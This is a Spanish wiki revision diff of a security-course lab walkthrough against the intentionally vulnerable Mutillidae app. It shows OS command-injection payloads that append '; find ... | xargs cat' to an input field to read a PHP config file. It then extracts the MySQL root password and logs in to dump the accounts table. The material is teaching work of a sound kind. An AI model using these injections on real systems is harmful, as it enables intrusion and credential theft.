Herramientas de usuario
sad:fedora14:p2
Diferencias
Muestra las diferencias entre dos versiones de la página.
| Ambos lados, revisión anterior Revisión previa Próxima revisión | Revisión previa | ||
|
sad:fedora14:p2 [2018/01/24 15:32] José Manuel Guallar |
sad:fedora14:p2 [2019/01/04 13:18] (actual) |
||
|---|---|---|---|
| Línea 157: | Línea 157: | ||
| Hemos hecho parte del trabajo, porque ahora tenemos la contraseña "samurai", que está en el fichero MYSQLHandler.php pero no sabemos el usuario que utiliza esa contraseña, por lo que vamos a buscar en MySQLHandler.php las palabras usuario (user) o login | Hemos hecho parte del trabajo, porque ahora tenemos la contraseña "samurai", que está en el fichero MYSQLHandler.php pero no sabemos el usuario que utiliza esa contraseña, por lo que vamos a buscar en MySQLHandler.php las palabras usuario (user) o login | ||
| + | <code bash> | ||
| www.colegiomontessori.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs egrep -i '(user|login)' | grep "=" | www.colegiomontessori.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs egrep -i '(user|login)' | grep "=" | ||
| + | </code> | ||
| {{:sad:fedora:p2:13.png?500|}} | {{:sad:fedora:p2:13.png?500|}} | ||
| Línea 163: | Línea 165: | ||
| Nos da mucha información, por un lado nos dice que el usuario es root y por otro lado como php se conecta y autentifica con MySQL, eso lo podemos ver en las lisneas $this->mMySQLConnection _... | Nos da mucha información, por un lado nos dice que el usuario es root y por otro lado como php se conecta y autentifica con MySQL, eso lo podemos ver en las lisneas $this->mMySQLConnection _... | ||
| - | Mostrar MySQLHandler.php | + | **Mostrar MySQLHandler.php** |
| Creo que podría haberte mostrado esto primero, pero las cosas buenas llegan a los que esperan. | Creo que podría haberte mostrado esto primero, pero las cosas buenas llegan a los que esperan. | ||
| - | Es posible visualizar los contenidos del programa MySQLHandler.php, codificando las etiquetas "<? Php" y "?>". Estas etiquetas le dicen a Apache que ejecute un script php. | + | Es posible visualizar los contenidos del programa** MySQLHandler.php**, codificando las etiquetas "<? Php" y "?>". Estas etiquetas le dicen a Apache que ejecute un script php. |
| Para evitar este problema y simplemente mostrar el texto del programa, cambiamos "<" a "& # 60;" y ">" a "& # 62;". | Para evitar este problema y simplemente mostrar el texto del programa, cambiamos "<" a "& # 60;" y ">" a "& # 62;". | ||
| + | <code bash> | ||
| www.colegiomontessor.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs cat | sed 's/</\</g' | sed 's/>/\>/g' | www.colegiomontessor.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs cat | sed 's/</\</g' | sed 's/>/\>/g' | ||
| + | </code> | ||
| {{:sad:fedora:p2:14.png?500|}} | {{:sad:fedora:p2:14.png?500|}} | ||
| Línea 177: | Línea 180: | ||
| Aqui sacamos mucha mucha información LOLLOL por un lado "root" el usuario de la base de datos, por otro lado "samurai" la contraseña de la base de datos y por ultimo "nowasp" el nombre de la base de datos | Aqui sacamos mucha mucha información LOLLOL por un lado "root" el usuario de la base de datos, por otro lado "samurai" la contraseña de la base de datos y por ultimo "nowasp" el nombre de la base de datos | ||
| + | <code mysql> | ||
| static public $mMySQLDatabaseUsername = "root"; | static public $mMySQLDatabaseUsername = "root"; | ||
| Línea 183: | Línea 186: | ||
| static public $mMySQLDatabaseName = "nowasp"; | static public $mMySQLDatabaseName = "nowasp"; | ||
| + | </code> | ||
| - | Ahora podemos ir al terminal de nuestro Backtrack | + | Ahora podemos ir al terminal de nuestro **Backtrack** |
| + | <code bash> | ||
| root@bt:~# mysql -h 192.168.153.39 -uroot -psamurai | root@bt:~# mysql -h 192.168.153.39 -uroot -psamurai | ||
| mysql> show databases; | mysql> show databases; | ||
| mysql> use nowasp; | mysql> use nowasp; | ||
| + | </code> | ||
| {{:sad:fedora:p2:15.png?500|}} | {{:sad:fedora:p2:15.png?500|}} | ||
| - | Ahora vamos a nevegar por la tablas | + | ====== A nevegar por la tablas ====== |
| Basicamente vamos a mirar que tablas contienen información del usuario y de la contraseña | Basicamente vamos a mirar que tablas contienen información del usuario y de la contraseña | ||
| Línea 198: | Línea 204: | ||
| {{:sad:fedora:p2:16.png?500|}} | {{:sad:fedora:p2:16.png?500|}} | ||
| + | <code mysql> | ||
| mysql> select * from accounts; | mysql> select * from accounts; | ||
| mysql> quit; | mysql> quit; | ||
| + | </code> | ||
| {{:sad:fedora:p2:17.png?500|}} | {{:sad:fedora:p2:17.png?500|}} | ||
| + | |||
| **''Print de pantalla a entregar''** | **''Print de pantalla a entregar''** | ||
sad/fedora14/p2.1516807960.txt.gz · Última modificación: 2019/01/04 13:18 (editor externo)
Herramientas de la página
Excepto donde se indique lo contrario, el contenido de este wiki esta bajo la siguiente licencia: CC Attribution-Share Alike 4.0 International
